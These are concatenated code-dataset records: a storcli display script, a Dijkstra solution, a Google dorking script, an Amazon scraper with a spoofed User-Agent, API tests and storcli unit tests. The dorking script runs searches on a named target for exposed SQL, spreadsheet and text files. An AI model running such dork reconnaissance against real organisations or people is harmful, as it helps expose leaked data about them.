\"9fc16042-95ae-46b9-84bc-4777b3b9f89c\",\n    #      \"vpnservice_id\": \"75f35f53-ecbd-4748-a070-3316435e35cc\",\n    #      \"availability_zone\": \"jp-east-1a\"\n    #    }\n    #  },\n    #  \"Content-Type\": \"application/json;charset=UTF-8\",\n    #  \"status_code\": 200\n    #}\n\n    item = data.get('ipsec_site_connection', {})\n\n    disp_keys = [\n        'name', 'id', 'peer_address', 'peer_id', 'psk',\n        'vpnservice_id', 'ikepolicy_id', 'ipsecpolicy_id',\n        'route_mode', 'mtu', 'initiator', 'auth_mode', 'status',\n        'tenant_id', 'availability_zone', 'description']\n\n    disp_list = []\n\n    for key in disp_keys:\n        row = []\n        row.append(key)\n        row.append(item.get(key, ''))\n        disp_list.append(row)\n\n    print(\"GET /v2.0/vpn/ipsec-site-connections/{connection-id}\")\n    print(tabulate(disp_list, tablefmt='rst'))\n\n    # \"dpd\": {\n    #   \"action\": \"restart\",\n    #   \"timeout\": 30,\n    #   \"interval\": 10\n    # },\n    dpd = item.get('dpd', {})\n    dpd_list = []\n    dpd_keys = ['action', 'timeout', 'interval']\n    for key in dpd_keys:\n        row = []\n        row.append(key)\n        row.append(dpd.get(key, ''))\n        dpd_list.append(row)\n\n    print(\"\")\n    print(\"dpd\")\n    print(tabulate(dpd_list, tablefmt='rst'))\n\n    # \"peer_cidrs\": [\n    #   \"10.2.1.0/24\"\n    # ],\n    peer_cidrs_list = []\n    for cidr in item.get('peer_cidrs', []):\n        peer_cidrs_list.append([cidr])\n\n    print(\"\")\n    print(\"peer_cidrs\")\n    print(tabulate(peer_cidrs_list, tablefmt='rst'))\n\n\nif __name__ == '__main__':\n\n    import argparse\n\n    def main():\n        \"\"\"Main function\"\"\"\n        parser = argparse.ArgumentParser(description='Shows details about a specified IPSec site-to-site 
connection.')\n        parser.add_argument('connection_id', metavar='id', help='The IPSec site connection id.')\n        parser.add_argument('--dump', action='store_true', default=False, help='Dump json result and exit.')\n        args = parser.parse_args()\n        connection_id = args.connection_id\n        dump = args.dump\n\n        if connection_id == '-':\n            import re\n            regex = re.compile('^([a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12}).*', re.I)\n            for line in sys.stdin:\n                match = regex.match(line)\n                if match:\n                    uuid = match.group(1)\n                    result = access_api(connection_id=uuid)\n                    print(\"connection_id: {}\".format(uuid))\n                    print_result(result)\n                    print(\"\")\n                    sys.stdout.flush()\n            return 0\n\n        # Run\n        result = access_api(connection_id=connection_id)\n\n        # Inspect the raw content\n        if dump:\n            print(json.dumps(result, indent=2))\n            return 0\n\n        # Display\n        print_result(result)\n\n        return 0\n\n\n    # Run\n    sys.exit(main())\n","repo_name":"takamitsu-iida/k5c","sub_path":"bin/k5-show-site-connection.py","file_name":"k5-show-site-connection.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"8437129606","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nINF = 1e9\n\nV,E = map(int, input().split())\nst = int(input())\ngraph = [[] for _ in range(V+1)]\nfor _ in range(E):\n    u,v,w = map(int, input().split())\n    graph[u].append((v, w))\ndist = [INF] * (V+1)\n\ndef func():\n    q = []\n    dist[st] = 0\n    heapq.heappush(q, (0, st))\n    \n    while q:\n        d, now = heapq.heappop(q)\n        if dist[now] < d:\n            continue\n        for v,w in graph[now]:\n            cost = d + w\n            if cost < dist[v]:\n                dist[v] = cost\n                heapq.heappush(q, (cost, v))\n    \nfunc()\n\nfor i in range(1, V+1):\n    if dist[i] == INF:\n        print('INF')\n    else:\n        print(dist[i])\n","repo_name":"moon9ua/study_ps","sub_path":"BOJ/shortest_path/dijkstra/1753.py","file_name":"1753.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"38735156501","text":"from googlesearch import search\nimport sys\n\narguments = sys.argv[1:]\ntarget = ' '.join(arguments)\n\n\ndef google_dork_search(query, num_results=10):\n    try:\n        print(f\"Searching the following query: {query}\")\n        results = search(query, stop=num_results)\n        for i, result in enumerate(results, start=1):\n            print(f\"{i}. 
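The Dijkstra solution above (BOJ 1753) relies on the stale-entry check `if dist[now] < d: continue` to skip heap entries that were superseded by a shorter path. Running it against the problem's sample input, as I recall it:

# stdin:
# 5 6
# 1
# 5 1 1
# 1 2 2
# 1 3 3
# 2 3 4
# 2 4 5
# 3 4 6
#
# stdout, one line per vertex 1..5: 0, 2, 3, 7, INF
# (vertex 5 is unreachable from the start vertex 1 with these directed edges)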
{results}\")\n\n except Exception as e:\n print(f\"Error: {e}\")\n\n\nsearchList = [\n f'\\\"{target}\\\"',\n f'site:linkedin.com \\\"{target}\\\"',\n f'inurl:\\\"{target}\\\"',\n f'intitle:\\\"{target}\\\"',\n f'intext:\\\"{target}\\\"',\n f'filetype:pdf \\\"{target}\\\"',\n f'filetype:docs \\\"{target}\\\"',\n f'filetype:sql \\\"{target}\\\"',\n f'filetype:xls \\\"{target}\\\"',\n f'filetype:txt \\\"{target}\\\"',\n]\n\nfor query in searchList:\n google_dork_search(query)\n","repo_name":"hoyosdilan/googleDorking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31212668340","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport time\r\n\r\ndef scrape_products(url):\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}\r\n response = requests.get(url, headers=headers)\r\n\r\n if response.status_code == 200:\r\n soup = BeautifulSoup(response.content, \"html.parser\")\r\n products = []\r\n\r\n # Find product containers on the page\r\n product_containers = soup.find_all(\"div\", {\"data-component-type\": \"s-search-result\"})\r\n\r\n for container in product_containers:\r\n try:\r\n product_url = \"https://www.amazon.in\" + container.find(\"a\", class_=\"a-link-normal\").get(\"href\")\r\n product_name = container.find(\"span\", class_=\"a-size-medium\").text.strip()\r\n product_price = container.find(\"span\", class_=\"a-offscreen\").text.strip()\r\n product_rating = container.find(\"span\", class_=\"a-icon-alt\").text.strip()\r\n product_reviews = container.find(\"span\", {\"class\": \"a-size-base\"}).text.strip()\r\n products.append({\"Product URL\": product_url, \"Product Name\": product_name, \"Product Price\": product_price, \"Rating\": product_rating, \"Number of Reviews\": product_reviews})\r\n except AttributeError:\r\n continue\r\n\r\n return products\r\n\r\n else:\r\n print(f\"Failed to fetch the page: {url}\")\r\n return None\r\n\r\nbase_url = \"https://www.amazon.in/s?k=bags&crid=2M096C61O4MLT&qid=1653308124&sprefix=ba%2Caps%2C283&ref=sr_pg_\"\r\ntotal_pages = 20\r\nall_products = []\r\n\r\nfor page in range(1, total_pages + 1):\r\n url = base_url + str(page)\r\n print(f\"Fetching URL: {url}\")\r\n products_on_page = scrape_products(url)\r\n if products_on_page:\r\n all_products.extend(products_on_page)\r\n # time.sleep(3) # Add a delay of 3 seconds between each page request\r\n\r\n\r\ndf = pd.DataFrame(all_products)\r\ndf.to_csv(r\"amazon_scrape.csv\", index=False)\r\n","repo_name":"NaeemNiyas/web_scraping","sub_path":"WebScraping_Part1.py","file_name":"WebScraping_Part1.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8706288385","text":"from httpx import AsyncClient\n\n\"\"\"\nТестируем API по работе с историями пользователя\n\"\"\"\n\n\nasync def test_add_hisory_user_success(ac: AsyncClient):\n response = await ac.post(\"/visited_links\", json={\n \"links\": [\n \"yandex.ru\",\n \"yandex.ru/web\",\n \"yandex.ru\",\n \"sberbank.ru\",\n ]\n })\n\n assert response.status_code == 200\n\nasync def test_add_user_history_empty_list(ac: AsyncClient):\n # Создаем тестовые данные с пустым списком ссылок\n data = {\n \"links\": []\n }\n\n # Отправляем POST-запрос\n response = await 
ac.post(\"/visited_links\", json=data)\n\n # Проверяем статус код и ожидаемый результат\n assert response.status_code == 400\n assert response.json() == {\"detail\": \"Пустой список\"}\n\n\nasync def test_add_user_history_number_list(ac: AsyncClient):\n # Создаем тестовые данные с пустым списком ссылок\n data = {\n \"links\": [123, True, 7.0, (1, 2, 3)]\n }\n\n # Отправляем POST-запрос\n response = await ac.post(\"/visited_links\", json=data)\n\n # Проверяем статус код и ожидаемый результат\n assert response.status_code == 400\n assert response.json() == {\"detail\": \"Некорректный формат данных. Ожидается список строк.\"}\n\n\nasync def test_add_user_history_invalid_data(ac: AsyncClient):\n # Создаем тестовые данные с неверным форматом\n data = {\n \"links\": \"https://example.com\"\n }\n\n # Отправляем POST-запрос\n response = await ac.post(\"/visited_links\", json=data)\n\n # Проверяем статус код и ожидаемый результат\n assert response.status_code == 422\n","repo_name":"MRNurutdinov/test_ops","sub_path":"tests/test_api_client_history.py","file_name":"test_api_client_history.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9531190272","text":"import json\nimport mock\nimport unittest\n\nfrom tests_helpers import MultiReturnValues, add_top_srcdir_to_path,\\\n read_expected\n\n\nadd_top_srcdir_to_path()\n\nimport storrest\nfrom storrest.storutils import strlst, vd_raid_type\n\nSTORCLI_SHOW = read_expected('call_show.json')\nSTORCLI_SHOW_ALL = read_expected('call_show_all.json')\nSTORCLI_ENCLOSURES_SHOW = read_expected('c0_eall_show.json')\nSTORCLI_C0_EALL_SALL_SHOW = read_expected('c0_eall_sall_show_all.json')\nSTORCLI_C1_SALL_SHOW = read_expected('c1_sall_show_all.json')\n\n\ndef extract_controller_raw_data(raw_dat, controller_id, serialize=True):\n def _controller_match(ctrl):\n return ctrl['Command Status']['Controller'] == controller_id\n\n dat = json.loads(raw_dat)\n subdat = [ctrl for ctrl in dat['Controllers'] if _controller_match(ctrl)]\n ret = {'Controllers': subdat}\n return json.dumps(ret) if serialize else ret\n\n\nclass StorcliTest(unittest.TestCase):\n def setUp(self):\n super(StorcliTest, self).setUp()\n self.maxDiff = None\n self.patcher = mock.patch('storrest.storcli.subprocess.check_output')\n self.mock_check_output = self.patcher.start()\n self.mock_check_output.return_value = STORCLI_SHOW_ALL\n self.storcli = storrest.storcli.Storcli()\n self._expected_virtual_drives = None\n self._expected_physical_drives = None\n self._controller_details = None\n self.controllers = [{'controller_id': 0,\n 'pci_address': '00:06:00:00',\n 'model': 'Nytro MegaRAID8100-4i',\n 'serial_number': '',\n 'enclosures': [62, 252],\n 'host_interface': 'PCIE',\n 'sas_address': '5000000012345678',\n 'capabilities': {'max_cachecade_size': 1024, },\n 'health': None,\n },\n {'controller_id': 1,\n 'pci_address': None,\n 'model': \"Nytro WarpDrive XP6210-4A2048\",\n 'serial_number': '123456789',\n 'host_interface': 'PCIE',\n 'sas_address': ' 500605b012061206',\n 'enclosures': [],\n 'capabilities': {'max_cachecade_size': 0, },\n 'health': {\n 'temperature': ' 72 (degree C)',\n 'warranty_remaining': ' 100 (percent)',\n 'overall_health': 'GOOD',\n },\n }]\n self.controllers = sorted(self.controllers)\n\n def tearDown(self):\n super(StorcliTest, self).tearDown()\n self.patcher.stop()\n\n @property\n def expected_physical_drives(self):\n if self._expected_physical_drives:\n return 
self._expected_physical_drives\n else:\n physical_drives = read_expected('pdrives.json', raw=False)\n self._expected_physical_drives = sorted(physical_drives)\n return self._expected_physical_drives\n\n @property\n def expected_virtual_drives(self):\n if self._expected_virtual_drives:\n return self._expected_virtual_drives\n else:\n vds = read_expected('vdrives_skel.json', raw=False)\n for vd in vds:\n drive_group = vd['drive_group']\n controller_id = vd['controller_id']\n pdrives = sorted([d for d in self.expected_physical_drives\n if d['controller_id'] == controller_id\n and d['drive_group'] == drive_group])\n vd['physical_drives'] = pdrives\n self._expected_virtual_drives = sorted(vds)\n return self._expected_virtual_drives\n\n def test_physical_drives(self):\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW,\n STORCLI_C0_EALL_SALL_SHOW,\n STORCLI_C1_SALL_SHOW\n ])\n actual = sorted(self.storcli.all_physical_drives)\n expected_commands = (\n '{storcli_cmd} /call show J',\n '{storcli_cmd} /c0/eall/sall show all J',\n '{storcli_cmd} /c1/sall show all J',\n )\n self.verify_storcli_commands(expected_commands)\n self.assertEqual(actual, self.expected_physical_drives)\n\n def test_virtual_drives(self):\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW,\n STORCLI_C0_EALL_SALL_SHOW,\n STORCLI_C1_SALL_SHOW\n ])\n actual = sorted(self.storcli.all_virtual_drives)\n expected_commands = (\n '{storcli_cmd} /call show J',\n '{storcli_cmd} /c0/eall/sall show all J',\n '{storcli_cmd} /c1/sall show all J',\n )\n self.verify_storcli_commands(expected_commands)\n self.assertEqual(actual, self.expected_virtual_drives)\n\n def _get_nytrocache(self, raid_type='nytrocache'):\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW,\n STORCLI_C0_EALL_SALL_SHOW,\n STORCLI_C1_SALL_SHOW\n ])\n expected_commands = (\n '{storcli_cmd} /call show J',\n '{storcli_cmd} /c0/eall/sall show all J',\n '{storcli_cmd} /c1/sall show all J',\n )\n actual = sorted(self.storcli.virtual_drives(raid_type=raid_type))\n self.verify_storcli_commands(expected_commands)\n expected = sorted([vd for vd in self.expected_virtual_drives\n if vd_raid_type(vd) == raid_type])\n self.assertEqual(actual, expected)\n\n def test_get_nytrocache(self):\n self._get_nytrocache(raid_type='nytrocache')\n\n def test_get_cachecade(self):\n self._get_nytrocache(raid_type='cachecade')\n\n def test_controllers(self):\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW_ALL,\n STORCLI_ENCLOSURES_SHOW,\n read_expected('c0_show_health.json'),\n read_expected('c1_show_health.json')\n ])\n actual = self.storcli.controllers\n self.assertEqual(actual, self.controllers)\n expected_commands = (\n '{storcli_cmd} /call show all J',\n # controller 1 is NytroWarpDrive and has no enclosures\n '{storcli_cmd} /c0/eall show J',\n '{storcli_cmd} /c0 show health J',\n '{storcli_cmd} /c1 show health J',\n )\n self.verify_storcli_commands(expected_commands)\n\n @property\n def controller_details(self):\n if self._controller_details is not None:\n return self._controller_details\n for cobj in self.controllers:\n cobj['physical_drives'] = \\\n sorted([d for d in self.expected_physical_drives\n if d['controller_id'] == cobj['controller_id']])\n cobj['virtual_drives'] = \\\n sorted([vd for vd in self.expected_virtual_drives\n if vd['controller_id'] == cobj['controller_id']])\n self._controller_details = self.controllers\n return self._controller_details\n\n def _test_controller_details(self, 
capabilities=True,\n controller_health_works=False):\n controller_id = 0\n controller_dat = extract_controller_raw_data(STORCLI_SHOW_ALL,\n controller_id,\n serialize=False)\n if not capabilities:\n del controller_dat['Controllers'][0][\n 'Response Data']['Capabilities']\n\n controller_health = read_expected(\n 'c{0}_show_health.json'.format(controller_id), raw=False)\n if controller_health_works:\n status_obj = controller_health['Controllers'][0]['Command Status']\n del status_obj['ErrCd']\n status_obj['Status'] = 'Success'\n expected_controller = [c for c in self.controllers\n if c['controller_id'] == controller_id][0]\n expected_controller['health'] = {\n 'temperature': '74',\n 'overall_health': 'GOOD',\n 'warranty_remaining': '100',\n }\n\n self.mock_check_output.side_effect = MultiReturnValues([\n json.dumps(controller_dat),\n STORCLI_ENCLOSURES_SHOW,\n json.dumps(controller_health),\n STORCLI_C0_EALL_SALL_SHOW,\n ])\n expected = [c for c in self.controller_details\n if c['controller_id'] == controller_id][0]\n if not capabilities:\n expected['capabilities']['max_cachecade_size'] = 0\n\n actual = self.storcli.controller_details(controller_id=controller_id)\n actual['physical_drives'] = sorted(actual['physical_drives'])\n actual['virtual_drives'] = sorted(actual['virtual_drives'])\n self.assertEqual(actual, expected)\n expected_commands = (\n '{storcli_cmd} /c{controller_id} show all J',\n '{storcli_cmd} /c{controller_id}/eall show J',\n '{storcli_cmd} /c{controller_id} show health J',\n '{storcli_cmd} /c{controller_id}/eall/sall show all J',\n )\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id)\n\n def test_controller_details(self):\n self._test_controller_details()\n\n def test_controller_details_nocaps(self):\n self._test_controller_details(capabilities=False)\n\n def test_controller_details_health(self):\n self._test_controller_details(controller_health_works=True)\n\n def test_controller_details_all(self):\n controller_id = None\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW_ALL,\n STORCLI_ENCLOSURES_SHOW,\n read_expected('c0_show_health.json'),\n STORCLI_C0_EALL_SALL_SHOW,\n read_expected('c1_show_health.json'),\n STORCLI_C1_SALL_SHOW,\n ])\n expected_commands = (\n '{storcli_cmd} /call show all J',\n '{storcli_cmd} /c0/eall show J',\n '{storcli_cmd} /c0 show health J',\n '{storcli_cmd} /c0/eall/sall show all J',\n '{storcli_cmd} /c1 show health J',\n '{storcli_cmd} /c1/sall show all J',\n )\n actual = self.storcli.controller_details(controller_id)\n self.verify_storcli_commands(expected_commands)\n self.assertEqual(actual, self.controller_details)\n\n def test_virtual_drive_details(self):\n controller_id = 0\n virtual_drive_id = 0\n self.mock_check_output.side_effect = MultiReturnValues([\n extract_controller_raw_data(STORCLI_SHOW_ALL, controller_id),\n STORCLI_C0_EALL_SALL_SHOW\n ])\n actual = self.storcli.virtual_drive_details(controller_id,\n virtual_drive_id)\n expected = [vd for vd in self.expected_virtual_drives\n if vd['controller_id'] == controller_id and\n vd['virtual_drive'] == virtual_drive_id][0]\n expected_commands = (\n '{storcli_cmd} /c{controller_id} show J',\n '{storcli_cmd} /c{controller_id}/eall/sall show all J',\n )\n self.assertEqual(actual, expected)\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id)\n\n def test_virtual_drive_details_nonexistent(self):\n self.mock_check_output.return_value = STORCLI_SHOW\n controller_id = 0\n virtual_drive_id = 100500\n with 
self.assertRaises(storrest.storcli.StorcliError):\n self.storcli.virtual_drive_details(controller_id,\n virtual_drive_id)\n expected_commands = (\n '{storcli_cmd} /c{controller_id} show J',\n '{storcli_cmd} /c0/eall/sall show all J',\n '{storcli_cmd} /c1/sall show all J',\n )\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id)\n\n def verify_storcli_commands(self, expected_commands, **kwargs):\n kwargs['storcli_cmd'] = ' '.join(self.storcli.storcli_cmd)\n expected_calls = [((cmd.format(**kwargs).split(), ), {})\n for cmd in expected_commands]\n actual_calls = self.mock_check_output.call_args_list\n self.assertEqual(actual_calls, expected_calls)\n\n def _make_success_reply(self, controller_id, serialize=True):\n return self._make_reply(controller_id, serialize=serialize)\n\n def _make_reply(self, controller_id, error_code=None, serialize=True):\n data = {\n 'Controllers': [\n {\n 'Command Status': {\n 'Controller': controller_id,\n 'Status': 'Success' if not error_code else 'Failed',\n 'Description': 'None',\n },\n },\n ]}\n\n if error_code:\n data['Controllers'][0]['Command Status']['ErrCd'] = error_code\n\n return json.dumps(data) if serialize else data\n\n def _mock_success_reply(self, controller_id):\n self.mock_check_output.return_value = \\\n self._make_success_reply(controller_id)\n\n def test_create_warp_drive_vd_dflt(self):\n controller_id = 0\n self._mock_success_reply(controller_id)\n self.storcli.create_warp_drive_vd(controller_id)\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/eall/sall start format J',\n )\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id)\n\n def _create_warp_drive_vd_overprovision(self, overprovision):\n controller_id = 0\n self._mock_success_reply(controller_id)\n self.storcli.create_warp_drive_vd(controller_id,\n overprovision=overprovision)\n\n overprovision_level = 'overprovision level'\n try:\n testval = int(overprovision)\n overprovision_level = 'overprovision'\n except:\n pass\n\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/eall/sall start format '\n '{overprovision_level}={overprovision} J',\n\n )\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id,\n overprovision_level=overprovision_level,\n overprovision=overprovision)\n\n def test_create_warp_drive_vd_cap(self):\n self._create_warp_drive_vd_overprovision('cap')\n\n def test_create_warp_drive_vd_perf(self):\n self._create_warp_drive_vd_overprovision('perf')\n\n def test_create_warp_drive_vd_percentage(self):\n self._create_warp_drive_vd_overprovision(50)\n\n def _create_raid(self,\n raid_type=None,\n raid_level=1):\n # XXX: these values must correspond the controllers state in\n # call_show_all.json (i.e. 
drives on specified controller, enclosure\n # and slots are part of RAID1 array)\n controller_id = 0\n if raid_type is None:\n enclosure = 62\n slots = (0, 1)\n elif raid_type == 'nytrocache':\n enclosure = '252'\n slots = ('4', 6)\n\n physical_drives = [{\n 'controller_id': controller_id,\n 'enclosure': enclosure,\n 'slot': slot\n } for slot in slots]\n pd_per_array = ''\n if raid_level in ('10', 10):\n pd_per_array = 2\n if pd_per_array:\n pd_per_array = 'PDperArray={0}'.format(pd_per_array)\n\n ssd_caching = raid_type is None\n io_policy = 'direct'\n\n self.mock_check_output.side_effect = MultiReturnValues([\n self._make_success_reply(controller_id),\n extract_controller_raw_data(STORCLI_SHOW, controller_id),\n STORCLI_C0_EALL_SALL_SHOW\n ])\n\n self.storcli.create_virtual_drive(physical_drives,\n raid_level=raid_level,\n raid_type=raid_type,\n io_policy=io_policy,\n ssd_caching=ssd_caching)\n expected_commands = (\n '{storcli_cmd} /c{controller_id} add vd {raid_type} '\n 'r{raid_level} drives={drives_str} '\n '{pd_per_array} {io_policy} {ssd_caching} J',\n '{storcli_cmd} /c{controller_id} show J',\n '{storcli_cmd} /c{controller_id}/eall/sall show all J',\n )\n drives_str = '{enclosure}:{slots}'.format(enclosure=enclosure,\n slots=strlst(slots))\n params = {\n 'controller_id': controller_id,\n 'raid_type': raid_type or '',\n 'raid_level': raid_level,\n 'drives_str': drives_str,\n 'io_policy': io_policy,\n 'ssd_caching': 'cachevd' if ssd_caching else '',\n 'pd_per_array': pd_per_array,\n }\n self.verify_storcli_commands(expected_commands, **params)\n\n def test_create_raid1(self):\n self._create_raid()\n\n def test_create_nytrocache(self):\n self._create_raid(raid_type='nytrocache')\n\n def test_create_raid10(self):\n self._create_raid(raid_level=10)\n\n def _create_raid_negative(self, valid_reply=True):\n raid_level = 1\n controller_id = 0\n enclosure = 62\n slots = (0, 1)\n physical_drives = [{\n 'controller_id': controller_id,\n 'enclosure': enclosure,\n 'slot': slot\n } for slot in slots]\n self.mock_check_output.return_value = \\\n self._make_reply(controller_id, error_code=42) \\\n if valid_reply else 'choke; JSON! 
parser'\n expected_commands = (\n '{storcli_cmd} /c{controller_id} add vd '\n 'r{raid_level} drives={enclosure}:{slots_str} J',\n )\n with self.assertRaises(storrest.storcli.StorcliError) as cm:\n self.storcli.create_virtual_drive(physical_drives,\n raid_level=raid_level)\n the_exception = cm.exception\n if not valid_reply:\n self.assertEqual(the_exception.error_code,\n storrest.storcli.INVALID_NYTROCLI_JSON)\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id,\n enclosure=enclosure,\n slots_str=strlst(slots),\n raid_level=raid_level)\n\n def test_create_virtual_drive_negative(self):\n self._create_raid_negative()\n\n def test_create_virtual_drive_invalid_reply(self):\n self._create_raid_negative(valid_reply=False)\n\n def test_create_virtual_drive_enclosure_missing(self):\n raid_level = 1\n controller_id = 0\n slots = (0, 1)\n physical_drives = [{\n 'controller_id': controller_id,\n # no enclosure here, this is intensional\n 'slot': slot\n } for slot in slots]\n with self.assertRaises(storrest.storcli.StorcliError):\n self.storcli.create_virtual_drive(physical_drives,\n raid_level=raid_level)\n self.verify_storcli_commands([])\n\n def test_delete_virtual_drive(self):\n controller_id = 0\n virtual_drive_id = 1\n force = True\n self._mock_success_reply(controller_id)\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/v{virtual_drive_id} del {force} J',\n )\n self.storcli.delete_virtual_drive(controller_id,\n virtual_drive_id,\n force=force)\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id,\n virtual_drive_id=virtual_drive_id,\n force='force' if force else '')\n\n def _delete_all(self, controller_id=None, is_warpdrive=False):\n self.mock_check_output.side_effect = MultiReturnValues([\n STORCLI_SHOW_ALL,\n self._make_success_reply(controller_id)\n ])\n vdrives_id = '0' if is_warpdrive else 'all'\n expected_commands = (\n '{storcli_cmd} /c{controller_id} show all J',\n '{storcli_cmd} /c{controller_id}/v%s del J' % vdrives_id,\n )\n self.storcli.delete_virtual_drive(controller_id, 'all')\n self.verify_storcli_commands(expected_commands,\n controller_id=controller_id)\n\n def test_delete_warpdrive(self):\n self._delete_all(controller_id=1, is_warpdrive=True)\n\n def test_delete_all_virtual_drives(self):\n self._delete_all(controller_id=0, is_warpdrive=False)\n\n def test_global_hotspare_create(self):\n params = {\n 'controller_id': 0,\n 'enclosure': 62,\n 'slot': 19\n }\n self._mock_success_reply(params['controller_id'])\n self.storcli.add_hotspare_drive(None, **params)\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/e{enclosure}/s{slot} '\n 'add hotsparedrive J',\n )\n self.verify_storcli_commands(expected_commands, **params)\n\n def test_global_hotspare_create_pdrive(self):\n pdrive = {\n 'controller_id': 0,\n 'enclosure': 62,\n 'slot': 19\n }\n self._mock_success_reply(pdrive['controller_id'])\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/e{enclosure}/s{slot} '\n 'add hotsparedrive J',\n )\n self.storcli.add_hotspare_drive(None, pdrive=pdrive)\n self.verify_storcli_commands(expected_commands, **pdrive)\n\n def test_add_dedicated_hotspare(self):\n params = {\n 'controller_id': 0,\n 'enclosure': 62,\n 'slot': 19,\n }\n target_vd = [vd for vd in self.expected_virtual_drives\n if vd['controller_id'] == params['controller_id'] and\n not vd['raid_level'].startswith('Nytro')][0]\n vdrives = [target_vd['virtual_drive']]\n\n self.mock_check_output.side_effect = MultiReturnValues([\n 
extract_controller_raw_data(STORCLI_SHOW,\n controller_id=params['controller_id']),\n STORCLI_C0_EALL_SALL_SHOW,\n self._make_success_reply(params['controller_id'])\n ])\n self.storcli.add_hotspare_drive(vdrives, **params)\n expected_commands = (\n '{storcli_cmd} /c{controller_id} show J',\n '{storcli_cmd} /c{controller_id}/eall/sall show all J',\n '{storcli_cmd} /c{controller_id}/e{enclosure}/s{slot} add '\n 'hotsparedrive dgs={drive_group} J',\n )\n params['drive_group'] = target_vd['drive_group']\n self.verify_storcli_commands(expected_commands, **params)\n\n def test_hotspare_delete(self):\n params = {\n 'controller_id': 0,\n 'enclosure': 62,\n 'slot': 19\n }\n self._mock_success_reply(params['controller_id'])\n self.storcli.delete_hotspare_drive(**params)\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/e{enclosure}/s{slot} '\n 'delete hotsparedrive J',\n )\n self.verify_storcli_commands(expected_commands, **params)\n\n def test_update_virtual_drive(self):\n controller_id = 0\n virtual_drive_id = 1\n self._mock_success_reply(controller_id)\n params = {\n 'name': 'FooBar',\n 'io_policy': 'direct',\n 'write_cache': 'wb',\n 'read_ahead': False,\n 'ssd_caching': True,\n }\n self.storcli.update_virtual_drive(controller_id,\n virtual_drive_id,\n **params)\n expected_commands = (\n '{storcli_cmd} /c{controller_id}/v{virtual_drive_id} set '\n 'iopolicy={io_policy} name={name} wrcache={write_cache} '\n 'rdcache={read_ahead} ssdcaching={ssd_caching} J',\n )\n params['controller_id'] = controller_id\n params['virtual_drive_id'] = virtual_drive_id\n params['ssd_caching'] = 'on' if params['ssd_caching'] else 'off'\n params['read_ahead'] = 'RA' if params['read_ahead'] else 'NoRA'\n self.verify_storcli_commands(expected_commands, **params)\n\n def test_nonexisting_command(self):\n self.mock_check_output.side_effect = \\\n OSError(2, 'no such file or directory', '/foo')\n cli = storrest.storcli.Storcli(storcli_cmd=['/foo'])\n with self.assertRaises(storrest.storcli.StorcliError):\n cli.all_virtual_drives\n\n def test_faulty_command(self):\n controller_id = 1\n returncode = 111\n error_code = 42\n command_output = self._make_reply(controller_id, error_code=error_code)\n self.mock_check_output.side_effect = \\\n storrest.storcli.subprocess.CalledProcessError(\n returncode,\n self.storcli.storcli_cmd,\n output=command_output\n )\n with self.assertRaises(storrest.storcli.StorcliError) as ee:\n self.storcli.all_virtual_drives\n the_exception = ee.exception\n self.assertEqual(the_exception.error_code, error_code)\n\n\nclass StorutilsTest(unittest.TestCase):\n def test_parse_phys_drive_state_unusual(self):\n from storrest.storutils import parse_phys_drive_state\n raw_weird_state = 'FooBar'\n processed_weird_state = parse_phys_drive_state(raw_weird_state)\n self.assertEqual(raw_weird_state.lower(), processed_weird_state)\n\n def test_size_units_conversion(self):\n from storrest.storutils import parse_drive_size\n sizes_tbl = {\n '1 Mb': 1024 * 1024,\n '10 Kb': 10 * 1024,\n '2 Tb': 2 * 1024 * 1024 * 1024 * 1024,\n }\n for str_size, size in sizes_tbl.iteritems():\n self.assertEqual(parse_drive_size(str_size), size)\n\n def test_size_units_conversion_negative(self):\n from storrest.storutils import parse_drive_size\n with self.assertRaises(ValueError):\n parse_drive_size('100500 FooBar')\n\n def test_parse_weird_virtual_drive_state(self):\n from storrest.storutils import parse_state\n raw_weird_state = 'FooBar'\n weird_state = parse_state(raw_weird_state)\n self.assertEqual(weird_state, 
